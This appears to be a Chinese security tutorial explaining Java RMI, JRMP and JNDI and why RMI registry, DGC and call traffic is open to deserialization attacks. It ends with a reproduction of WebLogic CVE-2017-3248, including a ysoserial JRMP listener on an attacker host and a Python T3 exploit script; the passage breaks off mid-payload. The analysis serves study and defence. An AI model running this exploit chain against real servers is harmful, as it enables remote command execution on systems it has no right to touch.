JAVA JRMP、RMI、JNDI、反序列化漏洞之间的风花雪月

本文主要内容: 1、讲清楚 java jrmp、rmi、jndi 之间的关联和联系。 2、从原理层面分析java rmi的使用,从而分析为什么会存在反序列化漏洞 3、对java rmi中的常见反序列化漏洞场景根据原理分类,并分析漏洞详情 4、分析JDK版本对反序列化漏洞的影响 5、分析并总结反序列化漏洞的常见修复方案

0x01 前言

本文主要内容: 1、讲清楚 java jrmp、rmi、jndi 之间的关联和联系。 2、从原理层面分析java rmi的使用,从而分析为什么会存在反序列化漏洞 3、对java rmi中的常见反序列化漏洞场景根据原理分类,并分析漏洞详情 4、分析JDK版本对反序列化漏洞的影响 5、分析并总结反序列化漏洞的常见修复方案

一、JRMP

JRMP是 Java Remote Message Protocol 的缩写,java远程通信协议。主要就是为进程间、主机间java进程之间通信制定的协议,其是基于TCP的流量协议。

二、RMI

RMI是 Remote Method Invocation的缩写,java中远程方法调用,主要是为了让java中的方法和对象能被远程调用,跨JVM调用,其是基于JRMP协议的。类比于RPC远程过程调用,c语言里面C 程序员一直使用远程过程调用 (RPC) 在远程主机上执行 C 函数并返回结果。这里JRMP是结合java特性(面向对象)设置的”RPC”。

三、JNDI

Java Naming and Directory Interface,Java的命名和目录的接口。其为java实现的应用程序提供命名、目录服务;java中常见的命名和目录服务有:

轻型目录访问协议 (LDAP)
通用对象请求代理架构 (CORBA) 通用对象服务 (COS) 名称服务
Java 远程方法调用 (RMI) 注册表
域名服务 (DNS)

也就是说JNDI的命名和目录服务

0x02 RMI

笔者对RMI的了解是在大学的时候java课程里面讲到的远程调用的时候,其核心就是远程调用其他主机上或者jvm上的类的相关方法,而远程调用过程中传输的数据内容是以序列化的形式传输的,必要的时候可能还会传输对象的引用等(当然也是以序列化的方式传输),传输的格式是基于JRMP协议的。

如下是rmi的一个样例,RMI中由三部分构成,Registry、Server 、Client

server:

定义一个接口类,这个接口类要继承Remote接口,其中定义一个接口方法(此方法就是之后要远程调用的方法)并且该接口方法要爬出RemoteException异常,然后在其实现类中重写接口方法的实现,并且实现类要继承UnicastRemoteObject类(这个类的相关方法作用于导出对象(存根/Stub)的处理以及JRMP的处理,当然这里其实也不是说一定要继承这个类,也可以通过其他方法手动导出,但是后文中都是以继承UnicastRemoteObject类这种方法)

接口类Hello:

  1. package newrmi;
  2. import java.rmi.Remote;
  3. import java.rmi.RemoteException;
  4. public interface Hello extends Remote {
  5. //定义的之后需要被远程调用的方法
  6. public String welcome(String name) throws RemoteException;
  7. }

实现类Helloimp:

  1. package newrmi;
  2. import java.rmi.RemoteException;
  3. import java.rmi.server.UnicastRemoteObject;
  4. public class Helloimp extends UnicastRemoteObject implements Hello {
  5. public Helloimp() throws RemoteException {
  6. }
  7. //重写远程方法实现
  8. @Override
  9. public String welcome(String name) throws RemoteException {
  10. return "hello"+name;
  11. }
  12. }

准备好之后还需要把这个远程对象绑定到Registry中,所以这里我们接下来先看下Registry实现

Registry:

使用LocateRegistry.createRegistry方法开启一个注册中心,然后server将刚刚准备的远程对象绑定到注册中心:

  1. package newrmi;
  2. import newrmi.Hello;
  3. import newrmi.Helloimp;
  4. import java.rmi.AlreadyBoundException;
  5. import java.rmi.RemoteException;
  6. import java.rmi.registry.LocateRegistry;
  7. import java.rmi.registry.Registry;
  8. public class RmiRegistryAndServer {
  9. public static void main(String\[\] args) {
  10. try {
  11. //开启远程注册中心
  12. Registry registry \= LocateRegistry.createRegistry(9999);
  13. // (server)绑定对象到注册中心,并给他取名为hello
  14. Hello hello \= new Helloimp();
  15. registry.bind("hellos",hello);
  16. System.out.println("open port for rmi for 9999:hellos");
  17. } catch (RemoteException | AlreadyBoundException e) {
  18. e.printStackTrace();
  19. }
  20. }
  21. }

Client:

客户端 去注册中心获取相关对象:

  1. package newrmi;
  2. import java.rmi.NotBoundException;
  3. import java.rmi.RemoteException;
  4. import java.rmi.registry.LocateRegistry;
  5. import java.rmi.registry.Registry;
  6. public class Client {
  7. public static void main(String\[\] args) {
  8. try {
  9. Registry registry \= LocateRegistry.getRegistry("localhost", 9999);
  10. Hello hello \= (Hello) registry.lookup("hellos");
  11. System.out.println(hello.welcome("axin"));
  12. } catch (RemoteException e) {
  13. e.printStackTrace();
  14. } catch (NotBoundException e) {
  15. e.printStackTrace();
  16. }
  17. }
  18. }

这里我测试的时候使用的是本机,所以这里客户端找Registry,直接在localhost找对应端口获取到对应的注册中心即可,然后通过lookup传入参数,来调用对应绑定对应名称的对象:

运行client:如下,可以看到相关方法被调用了:

image.png

以上是rmi过程中我们见到最多的常见,客户端向Registry lookup一个名称,最终实现对某个远程方法的调用。

接下来我们详细的学习下rmi的全过程:

一、RMI全过程

一般来说rmi调用分为以下几步:

1、创建注册中心(createRegistry)

2、server端绑定相关对象到注册中心(bind/rebind)

3、客户端向注册中心查询(lookup)

image.png

第一个过程

创建Registry没啥好说的,直接通过LocalRegistry.CreateRegistry("端口")创建一个注册中心。

第二个过程

Server向注册中心绑定相关类对象,调用方法bind/rebind

开启一个Registry,然后Server调用bind方法绑定对象:

如下是server代码:

  1. import newrmi.Hello;
  2. import newrmi.Helloimp;
  3. import java.rmi.AlreadyBoundException;
  4. import java.rmi.RemoteException;
  5. import java.rmi.registry.LocateRegistry;
  6. import java.rmi.registry.Registry;
  7. public class Server {
  8. public static void main(String\[\] args) {
  9. try {
  10. //获取远程注册中心
  11. Registry registry = LocateRegistry.getRegistry(9999);
  12. // (server)绑定对象到注册中心,并给他取名为helloxxx
  13. Hello hello = new Helloimp();
  14. registry.bind("helloxxx",hello);
  15. System.out.println("open port for rmi for 9999:helloxxx");
  16. } catch (RemoteException e) {
  17. e.printStackTrace();
  18. }
  19. }
  20. }

运行server:

如下三图是笔者抓取server执行bind之后的流量记录:

server起了一个进程,使用2231端口和Registry使用的9999端口建立连接

image.png

image.png

image.png

分析上述三图,这里我们可以直观的看到 客户端和注册中心进行了jrmp握手之类的,然后就发送了一个序列化对象给注册中心。 这个序列化对象其实是远程类的一个stub(而发送给注册中心的这一过程就是由被bind的类上文提到的其继承的父类UnicastRemoteObject的方法中来实现),笔者在后文称其为存根(其实就是一个代理了远程类的对象的代理类)。 注意发送的不是远程类本身的对象。这里我们关注下存根里面的如下处:

image.png

image.png

上图中,在存根里面有一个IP(10.43.42.220是我本地无线网卡地址),IP之后跟的端口是,有一个08b6,转化成十进制之后是2230,其实这个就是server 最终将对应远程类置放的地址,这个地址存放到对象我们称其为骨根,也叫skeleton。这个骨根之后有大用处。

后续我们还能看到一个流量是:2232端口去连接我们上面算出来的server真正绑定远程对象的地址(2230端口):

image.png

image.png

仔细分析其中内容,我们可以发现,这里是又使用jrmp协议,Registry向Server中的骨根对象地址发起了一次dgc dirty请求,返回了一个Lease对象。

这里我们需要了解下dgc是干啥的,为啥Server的bind的流量中,Server将存根序列化对象传送到Registry之后,Registry还需要反过来dgc请求Server绑定的骨根。

dgc:

全称distributed garbage-collection,是java中支撑远程方法调用设计的一套垃圾回收协议,Dgc里面就两个方法,一个叫clean 一个叫dirty;

如下是jdk中对其的描述:

image.png

简单来说就是,当DGC中的客户端不需要存根的时候,就要调用clean方法,以便DGC的服务端可以回收相关垃圾。当DGC中的客户端持有某个存根或者需要持续的使用存根的时候,就要调用dirty方法,从而让DGC的服务端知道,客户端在使用,不能回收。除此之外使用dirty方法之后,会收到一个lease响应,这个lease里面会有一些时间的期限类的东西,超过期限还没有收到下一次的dirty请求,这个对象就会被回收。

更简单的说就是租房,dirty是续约操作,返回的lease是房东告诉你你付的钱够租到什么时候,如果到时间我还没收到续约,那就直接把你轰出去住大街,clean是说不续约了。

除此之外,这还有一个要点

传输内容的格式,传输对象的内容都是以序列化的形式出现在流量中:如下两图:

Server发送给Registry stub存根对象的时候,发送的是序列化后的存根对象:

image.png

如下是dgc的请求,发送的也是序列化对象

image.png

bind过程的总结图:

image.png

第三个过程:

客户端的lookup:

客户端向Registry发送lookup请求的时候,Registry会检索传入的名称来匹配stub存根对象,从而将stub对象返回到客户端。

客户端接收到存根之后,存根里面记录了骨根的位置,客户端就会请求骨根从而实现远程方法调用:

客户端代码:

  1. import java.rmi.NotBoundException;
  2. import java.rmi.RemoteException;
  3. import java.rmi.registry.LocateRegistry;
  4. import java.rmi.registry.Registry;
  5. public class Client {
  6. public static void main(String\[\] args) {
  7. try {
  8. Registry registry = LocateRegistry.getRegistry("localhost", 9999);
  9. Hello hello = (Hello) registry.lookup("helloxxx");
  10. System.out.println(hello.welcome(" axin"));
  11. } catch (RemoteException e) {
  12. e.printStackTrace();
  13. } catch (NotBoundException e) {
  14. e.printStackTrace();
  15. }
  16. }
  17. }

抓取流量:

如下图是,客户端从Registry(9999端口)获取到存根:

image.png

存根中的含有骨根的地址:本地的2230端口:

image.png

接着,客户端就会直接去server对应的骨根发起请求,如下图:

存在四个动作:

  • 客户端先发送一个DGC的dirty请求,表示我现在在用这个对象,请别回收。
  • 服务端返回一个lease对象,表示xxx时间之前给你用。
  • 客户端发送了一个字符串序列化对象,里面存放的是调用远程方法使用的参数。
  • 最后服务端返回一个序列化对象,里面存放的是远程方法调用结果。

image.png

image.png

lookup过程的总结图:

image.png

rmi的全部过程基本就是上述了,上述的过程中其实有很多薄弱的点,接下来我们来看,rmi中的被发现的安全问题。

二、RMI中的反序列化安全问题:

上文提到rmi中所有传输的对象都是以序列化的形式进行传输的,那么接收端就有一个反序列化还原的对象的操作,这个过程中如果没有做好防护和限制,对恶意的序列化对象进行反序列化,可能就会导致任意命令执行、代码执行的漏洞。

1、分析反序列化漏洞的场景:

(1、Server端bind 相关远程对象到Registry

情况1:

Server端发送一个序列化的stub存根到Registry,Registry会对该对象进行反序列化,如果这个对象是构造好存在调用链的,这个过程就变成了Server端对Registry进行攻击;如下图:(正常情况下发送的就是一个继承了UnicastRemoteObject类和继承了Remote接口的类的一个代理过去【也就是存根】))

image.png

情况2:Server端发送一个序列化的stub存根到Registry,Registry收到该对象之后要返回一个序列化对象获取,Server会对该对象进行反序列化,如果这个对象是构造好存在调用链的,这个过程就变成了Registry端对Server进行攻击;如下图:

image.png

情况3:

bind操作的流量里面,Registry收到stub之后,需要对其解析获取其中骨根的地址,向骨根发送一个DGC请求dirty,这个传输的也是一个序列化对象(这个对象正常是一个),如果这个对象是构造好的存在调用链的,Server端接收到该对象之后会对其进行反序列化。这个过程就变成了Registry对Server端进行的攻击。如下图:

image.png

情况4:

bind操作的流量里面,Registry收到stub之后,需要对其解析获取其中骨根的地址,向骨根(serve端)发送一个DGC请求dirty,serve端收到之后要返回一个lease对象(这个对象里面有相关时间记录,用来维护回收对象),这个对象的传输形式也是序列化,如果这个对象是构造好的存在调用链的,Registry端接收到该对象之后会对其进行反序列化。这个过程就变成了Server对Registry进行的攻击。如下图:

image.png

(2、客户端Lookup 向Registry绑定的远程对象

情况5:客户端通过lookup发送一个名称对象的序列化内容请求过去,Registry会对客户端的序列化内容进行反序列化,如果这个对象被替换成了构造好的存在调用链的恶意类对象,那么这个场景就变成了客户端对 Registry的攻击;如下图:

image.png

情况6:客户端通过lookup发送一个名称请求过去,Registry需要根据绑定的名称,返回对应远程对象的存根 stub,客户端收到存根,需要对其进行反序列化,如果这个存根对象被替换成了构造好的存在调用链的恶意类对象,那么这个过程就变成了Registry对客户端的攻击

image.png

情况7:客户端收到正常的存根之后,会根据存根里面的对象属性,找到服务端的骨根,接着向server端的骨根发送一个dgc的dirty请求,serve端收到之后会对其进行反序列化,如果这个对象被替换成了构造好的存在调用链的恶意类对象,那么这个过程就变成了客户端对服务端发起的攻击。

image.png

情况8:客户端收到正常的存根之后,会根据存根里面的对象属性,找到服务端的骨根,接着向server端的骨根发送一个dgc的dirty请求,serve端收到之后会返回一个lease对象的序列化内容给客户端,客户需要对这个对象进行反序列化,如果这个对象被替换成了构造好的存在调用链的恶意类对象,那么这个过程就变成了服务端对客户端发起的攻击。

image.png

2、除此之外:

其实还有两个情况,

情况9:就是远程调用的时候要传递参数,这个内容也都是序列化传输,可能会出现反序列化漏洞;

情况10:就是远程调用的时候要传递返回结果,这个内容也都是序列化传输,可能会出现反序列化漏洞;

3、总结:

简单总结上述的攻击场景:

如下图,开源看到其实情况1、2和情况3、4从攻击受害的角度来看是可以合并的。最后形成的关系其实就是6种攻击利用场景(没有把情况9和10画上去)

image.png

其实不然,最后的攻击场景从实现原理上来看,只有6种:上面的10个场景都涵盖在了下面的六种情况里面。

1、rmi:

  • 对存根对象的操作来实现攻击
  • 对存根处理的响应对象的操作来实现攻击
  • 对远程调用请求参数对象操作实现攻击
  • 对远程调用返回参数对象操作实现攻击

2、jrmp

  • 对DGC机制里面的dirty/clean操作发送的对象操作实现攻击
  • 对DGC机制里面的dirty/clean操作的响应对象操作实现攻击

4、场景代码分析

环境准备:这里笔者开了三个idea:

分别当作Registry、Client、Server

Registry: 这里java实现一个Registry的时候,在这里需要先绑定了一个对象(Helloimp),因为笔者测试的时候发现好像Registry上面没有对象是起不来的,所以就直接给绑了个对象,不影响其他。

  1. import rmi.Hello;
  2. import rmi.Helloimp;
  3. import java.rmi.AlreadyBoundException;
  4. import java.rmi.RemoteException;
  5. import java.rmi.registry.LocateRegistry;
  6. import java.rmi.registry.Registry;
  7. public class RmiRegistry {
  8. public static void main(String\[\] args) {
  9. try {
  10. //开启远程注册中心
  11. Registry registry \= LocateRegistry.createRegistry(9999);
  12. // (server)绑定对象到注册中心,并给他取名为hello
  13. Hello hello \= new Helloimp();
  14. registry.bind("hellos",hello);
  15. System.out.println("open port for rmi for 9999:hellos");
  16. } catch (RemoteException | AlreadyBoundException e) {
  17. e.printStackTrace();
  18. }
  19. }
  20. }

绑定对象的类的实现:

Hello接口(必须要继承Remote,并且定义远程抽象方法的时候要抛出RemoteException异常):

  1. package rmi;
  2. import java.rmi.Remote;
  3. import java.rmi.RemoteException;
  4. public interface Hello extends Remote {
  5. public String welcome(String name) throws RemoteException;
  6. }
  7. Helloimp实现类 实现定义的Hello接口并且要继承UnicastRemoteObject
  8. package rmi;
  9. import java.rmi.RemoteException;
  10. import java.rmi.server.UnicastRemoteObject;
  11. public class Helloimp extends UnicastRemoteObject implements Hello {
  12. public Helloimp() throws RemoteException {
  13. }
  14. @Override
  15. public String welcome(String name) throws RemoteException {
  16. return "hello"+name;
  17. }
  18. }

Server:

  1. package rmi;
  2. import java.rmi.AlreadyBoundException;
  3. import java.rmi.RemoteException;
  4. import java.rmi.registry.LocateRegistry;
  5. import java.rmi.registry.Registry;
  6. public class RmiServer {
  7. public static void main(String\[\] args) {
  8. try {
  9. //获取远程注册中心
  10. Registry registry \= LocateRegistry.getRegistry(9999);
  11. // (server)绑定对象到注册中心,并给他取名为hello
  12. Hello hello \= new HelloImp();
  13. registry.bind("Test",hello);
  14. System.out.println("open port for rmi for 9999:Test");
  15. } catch (RemoteException | AlreadyBoundException e) {
  16. e.printStackTrace();
  17. }
  18. }
  19. }

Server类中需要定义绑定的类:

绑定类的接口:

  1. package rmi;
  2. import java.rmi.Remote;
  3. import java.rmi.RemoteException;
  4. public interface Hello extends Remote {
  5. public String welcome(String name) throws RemoteException;
  6. }
  7. 实现类:和上面的Registry初始化绑定的类有细微差别,但是都是继承Hello接口
  8. package rmi;
  9. import java.rmi.RemoteException;
  10. import java.rmi.server.UnicastRemoteObject;
  11. public class HelloImp extends UnicastRemoteObject implements Hello {
  12. public HelloImp() throws RemoteException {
  13. }
  14. @Override
  15. public String welcome(String name) throws RemoteException {
  16. return "Hi good mooning "+name;
  17. }
  18. }

Client:

  1. import java.rmi.NotBoundException;
  2. import java.rmi.RemoteException;
  3. import java.rmi.registry.LocateRegistry;
  4. import java.rmi.registry.Registry;
  5. public class Client {
  6. public static void main(String\[\] args) {
  7. try {
  8. Registry registry \= LocateRegistry.getRegistry("localhost", 9999);
  9. Hello hello \= (Hello) registry.lookup("Test");
  10. System.out.println(hello.welcome(" axin"));
  11. } catch (RemoteException e) {
  12. e.printStackTrace();
  13. } catch (NotBoundException e) {
  14. e.printStackTrace();
  15. }
  16. }
  17. }

定义接口类:这里我们在客户端也要定义下远程类的接口,和其中的远程方法,用于接收对应类型的对象(笔者是这么理解的)

  1. package rmi;
  2. import java.rmi.Remote;
  3. import java.rmi.RemoteException;
  4. public interface Hello extends Remote {
  5. public String welcome(String name) throws RemoteException;
  6. }

环境准备好了,所有环境使用的JDK都是jdk8.031:

1)、对存根对象操作实现的攻击利用

这里我们先来看对存根对象操作实现的攻击利用,拿Registry和Server之间的处理来分析(bind操作):

Registry & Server

先运行Registry代码,起一个Registry:

image.png

然后在server的bind处打个断点,开始调试:

image.png

如下,server中我们可以看到,我们获取的Registry对象其实是一个RgistryImp_Stub对象(这里需要注意的是,RgistryImp_Stub是动态生成的,我们的断点是没办法打进去的,所以实际情况下我们要结合前后栈的情况,以及静态分析来分析)

image.png

接着我们new了一个HelloImp对象,但是似乎和我们认知中的HelloImp对象是有区别的;

原因是我们继承了UncastRemoteObject这个类,在调用HelloImp的构造方法的时候触发父类构造方法,最后在UncastRemoteObject类里面的exportObject()方法里面返回一个远程对象代理对象(其实就是我们上文理论中说的stub存根对象,同时上文也说到可以不继承这个类,那么我们就需要手动调用这个方法将stub导出):

image.png

image.png

接着我们来看bind方法;

RegistryImpl_Stub这个对象的bind方法如下:

image.png

如下,38行是再建立和Registry的连接,并传送了一个0,和一个hash值

image.png

接下来41行是获取建立连接的对象输出流,42、43行是将传入的两个参数序列化写到连接里面(一个是序列化的字符串 Test,一个是序列化的远程代理对象【导出的stub对象】)。

我们来看对端Registry这边是怎么处理请求的:

这里有一个小技巧,在对Registry调试的时候,我们找不到该在哪下断点。此时我们可以直接断点打到ObjectInputStream的readObject方法上即可,因为最后接收到的对象一定是要被反序列化的(殊途同归嘛)。

如下:

image.png

然后开始调试运行Registry,再正常运行Server:

直接来到下的readObject方法的断点处:

image.png

此时的函数调用栈如下:

image.png

其实整个过程的核心就是RegistryImpl_Skel()的 dispatch方法,在反序列化操作之前也就是这个方法,但是由于这个方法是在RegistryImpl_Skel里面的(笔者把这个对象理解成Registry的骨根)动态生成的,所以我们的断点没办法打进去调试,但是无妨,我们来静态分析下这个方法:

如下图:首先显示对var4做了核对,其实就是对Server端发送过来的hash值:

image.png

其他的几个参数我们看不到,这里我们可以再往栈上找:如下这个UnicastServerRef类里面,我们就可以看到了:

image.png

image.png

打上断点,重新调试其相关变量参数的值如下:

var1是RegistryImp的存根

image.png

var2是远程连接对象:

var3是0:其实就是上面Server端newcall的时候传入的opnum:0

image.png

此时我们再回到RegistryImpl_Skel()的 dispatch方法:

  1. public void dispatch(Remote var1, RemoteCall var2, int var3, long var4) throws Exception {
  2. if (var4 != 4905912898345647071L) {
  3. throw new SkeletonMismatchException("interface hash mismatch");
  4. } else {
  5. RegistryImpl var6 \= (RegistryImpl)var1;
  6. String var7;
  7. Remote var8;
  8. ObjectInput var10;
  9. ObjectInput var11;
  10. switch(var3) {
  11. case 0:
  12. try {
  13. var11 \= var2.getInputStream();
  14. var7 \= (String)var11.readObject();
  15. var8 \= (Remote)var11.readObject();
  16. } catch (IOException var94) {
  17. throw new UnmarshalException("error unmarshalling arguments", var94);
  18. } catch (ClassNotFoundException var95) {
  19. throw new UnmarshalException("error unmarshalling arguments", var95);
  20. } finally {
  21. var2.releaseInputStream();
  22. }
  23. var6.bind(var7, var8);
  24. try {
  25. var2.getResultStream(true);
  26. break;
  27. } catch (IOException var93) {
  28. throw new MarshalException("error marshalling return", var93);
  29. }
  30. case 1:
  31. var2.releaseInputStream();
  32. String\[\] var97 \= var6.list();
  33. try {
  34. ObjectOutput var98 \= var2.getResultStream(true);
  35. var98.writeObject(var97);
  36. break;
  37. } catch (IOException var92) {
  38. throw new MarshalException("error marshalling return", var92);
  39. }
  40. case 2:
  41. try {
  42. var10 \= var2.getInputStream();
  43. var7 \= (String)var10.readObject();
  44. } catch (IOException var89) {
  45. throw new UnmarshalException("error unmarshalling arguments", var89);
  46. } catch (ClassNotFoundException var90) {
  47. throw new UnmarshalException("error unmarshalling arguments", var90);
  48. } finally {
  49. var2.releaseInputStream();
  50. }
  51. var8 \= var6.lookup(var7);
  52. try {
  53. ObjectOutput var9 \= var2.getResultStream(true);
  54. var9.writeObject(var8);
  55. break;
  56. } catch (IOException var88) {
  57. throw new MarshalException("error marshalling return", var88);
  58. }
  59. case 3:
  60. try {
  61. var11 \= var2.getInputStream();
  62. var7 \= (String)var11.readObject();
  63. var8 \= (Remote)var11.readObject();
  64. } catch (IOException var85) {
  65. throw new UnmarshalException("error unmarshalling arguments", var85);
  66. } catch (ClassNotFoundException var86) {
  67. throw new UnmarshalException("error unmarshalling arguments", var86);
  68. } finally {
  69. var2.releaseInputStream();
  70. }
  71. var6.rebind(var7, var8);
  72. try {
  73. var2.getResultStream(true);
  74. break;
  75. } catch (IOException var84) {
  76. throw new MarshalException("error marshalling return", var84);
  77. }
  78. case 4:
  79. try {
  80. var10 \= var2.getInputStream();
  81. var7 \= (String)var10.readObject();
  82. } catch (IOException var81) {
  83. throw new UnmarshalException("error unmarshalling arguments", var81);
  84. } catch (ClassNotFoundException var82) {
  85. throw new UnmarshalException("error unmarshalling arguments", var82);
  86. } finally {
  87. var2.releaseInputStream();
  88. }
  89. var6.unbind(var7);
  90. try {
  91. var2.getResultStream(true);
  92. break;
  93. } catch (IOException var80) {
  94. throw new MarshalException("error marshalling return", var80);
  95. }
  96. default:
  97. throw new UnmarshalException("invalid method number");
  98. }
  99. }
  100. }

可以下面的逻辑是,对var3进行分析判断,分别对其是0,1,2,3,4进行处理:

image.png

上图中这里我们直接看0,因为之前我们Server传入的是0;接着38行从var2(连接)中获取对象输入流;

如下图:39、40从对象输入流中反序列化获取到两个参数,一个是String一个是远程对象(Server也是序列化发送了两个序列化参数,分别是名称和导出stub对象),最后再49行,Registry本地调用RegistryImp的bind方法,将获取到的名称和对象绑定上去。

image.png

最后我们简单来看下上面dispatch里面的4个case:

0其实就对应的bind;

1对应的是list操作,如下图

image.png

2对应的是lookup操作,如下图:

image.png

3对应的是rebind操作,如下图:

image.png

4对应的是unbind操作:

image.png

所以这里RegistryImpl_Skel对象的dispatch方法其实就是Registry处理来自客户端和服务端的请求的函数。

从上面我们可以得到一个结论,其实不管是哪个情况(bind/unbind/lookup/list)都存在不安全的反序列化场景,也就是被传输的序列化对象在jdk8_031版本没有做任何的安全校验直接进入反序列化。

攻击构造

所以这里我们尝试构造攻击就非常简单,找到一个符合远程调用的类的,并且构造一个这个类的实例,能够在反序列化的时候触发相关调用链即可:

所以关键就两个:一个是符合远程调用条件、第二个是调用链

第二个倒好说,因为调用链直接可以使用cc链里面的即可。比如使用cc2,构造一个特殊的优先队列,PriorityQueue,其被反序列化触发调用链即可:

如下图:直接构造cc2的优先队列对象,bind,但是出现了报错,也就是被发送的对象要符合条件。

image.png

查看bind方法对参数的要求:如下图,可以看到这个对象是Remote的子类

image.png

那么我们怎么把这个PriorityQueue这个优先队列转化成Remote呢,这里可以使用java里面的动态代理和cc1里面的思想一样,生成一个包含优先队列的远程代理对象:

如下图:

image.png

接着启动注册中心,然后运行我们的恶意的server,将构造好的对象bind过去,如下图,成功触发命令执行:

image.png

2)、对jrmp中dgc操作实现的攻击利用

这里我们同样也拿server 和Registry之间的bind操作来分析,因为在bind操作中,Registry接收到存根对象之后,需要发送dgc请求给Server上的骨根对象来”租借“对应的存根,以避免被回收;Server端正常情况下是要返回一个lease对象给Registry。

这里我们还是从bind这个操作里面来分析下代码:

Server发送stub给Registry,Registry反序列化stub之后的代码如下:其实就是接着上面的代码分析,在RegistryImp_skel的dispatch方法里面:

如下图case 0 就是bind操作的情况,可以看到39、40对收到的名称和stub对象反序列化之后,最终在46行的finally里面的调用了RemoteCall里面的releaseImputStream

image.png

跟进里面:如下图,可以看到之后跟进几步我们能看到,这里会创建一个DGCClient,并且初始化其内部类EndpointEntry的时候使用的远程地址就是传入的stub对象里面的骨根的远程地址(UnicastRef对象里面):

image.png

接着向对应远程地址发送一个DGC 的dirty操作:

image.png

image.png

进入dirty函数,如下60行处调用newCall()创建连接:

image.png

上图,接着在65行获取到连接的写出流,发送三个序列化对象过去,分别是对象ID和一个hash值,一个Lease对象。

接着,我们看下Server端怎么处理的这些序列化对象的:

如下是Server端的调用栈:

image.png

我们来到StreamRemoteCall:如下,server的骨根收到发送的序列化对象之后,

image.png

接着往下,可以看到这里case 2,拿到了流之后,对序列化内容的反序列化操作,这里我们可以看到也没有做任何的安全检查,直接反序列化Registry发送过来的DGC对象:

image.png

攻击构造

这里我们需要构造一个jrmp的DGC server其实就是一个监听(因为dgc通信只要符合jrmp即可),绑定一个存在反序列化调用链的恶意对象,然后rmi的Server端发送一个stub对象给Registry,这个stub我们要格外构造下将其中的UnicastRef里面的远程地址位位我们构造的jrmp DGC server的地址,这样根据我们上面分析的逻辑,Registry收到这个stub存根之后会发送一个DGC 的dirty操作给我们构造好的JRMP DGC server,JRMP DGC server返回我们构造好的恶意对象,Registry收到这个对象之后反序列化从而触发代码执行或者命令执行。

其中起一个jrmp DGC server 可以直接使用ysoserial里面的jrmp listern:

image.png

如下:

image.png

这里我们不再自己构造环境来模拟攻击,拿一个漏洞来说,weblogic 的CVE-2017-3248 反序列化漏洞,原理就是这个一模一样。

CVE-2017-3248

这里环境搭建直接使用 p神的vulhub项目里面的《Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)》即可,具体环境搭建参考:

https://vulhub.org/#/environments/weblogic/CVE-2017-10271/

复现:

windows :192.168.129.1

linux:192.168.129.142(172.28.0.1)

docker:(在linux上搭建的):172.28.0.2

复现利用过程步骤:

  • 1、利用ysoserial,在linux上搭建jrmp服务器,用于监听dgc层面的请求,并返回cc反序列化payload
  • 2、在windows上构造特殊封装的UnicastRef对象的序列化数据,使用t3协议发送至受害主机
  • 3、受害主机接受到特殊封装的UnnicastRef对象的序列化数据,反序列化时在dgc中触发jrmp请求,请求之前搭建好的jrmp服务器
  • 4、搭建好的jrmp服务器响应cc反序列化payload
  • 5、受害主机接受到到cc反序列化payload之后,在dgc层面反序列化,从而绕过之前补丁的过滤处,触发反序列化漏洞

上面提到的特殊封装的形式,并且最终是生成一个实现了Proxy对象,这个Proxy对象是的接口是Registry,其传入的实现了InvocationHandler接口的类为RemoteObjectInvocationHandler类实例对象:

image.png

根据上面提到的5步开展复现:

首先我们先借助ysoserial在linux上部署jrmp服务器(注意这里有一个坑点,因为我们复现的环境是在docker中,所以我们这个jrmp服务器得再docker容器所在的机器上部署,这样才能保住之后正常回连以及发送payload)

ysoserial下载地址:https://github.com/frohoff/ysoserial/

再linux中的7777端口部署jrmp服务器,并规定其利用的payload为cc1执行的命令是 touch /tmp/ga0weIs

image.png

然后在windows中利用下面这个exploit攻击脚本构造T3协议并发送特殊封装的UnicastRef对象的序列化数据(这里我们使用的是Ysoserial里面JRMPClient,JRMPClient里面其实就是构造了一个满足要求封装的UnicastRef对象[Registry对象],发送到目的端口):

image.png

image.png

exploit 构造t3协议以及发送:

  1. from \_\_future\_\_ import print\_function
  2. import binascii
  3. import os
  4. import socket
  5. import sys
  6. import time
  7. def generate\_payload(path\_ysoserial, jrmp\_listener\_ip, jrmp\_listener\_port, jrmp\_client):
  8. #generates ysoserial payload
  9. command = 'java -jar {} {} {}:{} > payload.out'.format(path\_ysoserial, jrmp\_client, jrmp\_listener\_ip, jrmp\_listener\_port)
  10. print("command: " + command)
  11. os.system(command)
  12. bin\_file = open('payload.out','rb').read()
  13. return binascii.hexlify(bin\_file)
  14. def t3\_handshake(sock, server\_addr):
  15. sock.connect(server\_addr)
  16. sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
  17. time.sleep(1)
  18. sock.recv(1024)
  19. print('handshake successful')
  20. def build\_t3\_request\_object(sock, port):
  21. data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f